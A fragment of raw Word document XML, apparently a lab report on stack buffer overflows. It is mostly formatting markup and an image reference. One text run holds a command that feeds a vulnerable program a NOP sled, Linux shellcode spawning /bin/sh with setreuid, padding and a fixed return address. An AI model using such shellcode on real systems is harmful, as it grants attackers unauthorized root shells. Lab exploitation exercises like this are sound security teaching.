          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="129771A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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="1915657"/>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5248" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId51"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="1915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7.75pt;height:150.84pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId51" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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460305B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color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">run $(python3 -c 'import sys; sys.stdout.buffer.write(b"\x90"*21 + b"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">\x41\x41\x41\x41\x42\x42\x42\x42" + b"\xe0\xf1\xff\xbf")')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14: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46C74C"/>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0ED81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20A90FFE"/>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Ø"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1429"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>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2026-04-11T21:32:02Z</dcterms:modified>
</cp:coreProperties>
</file>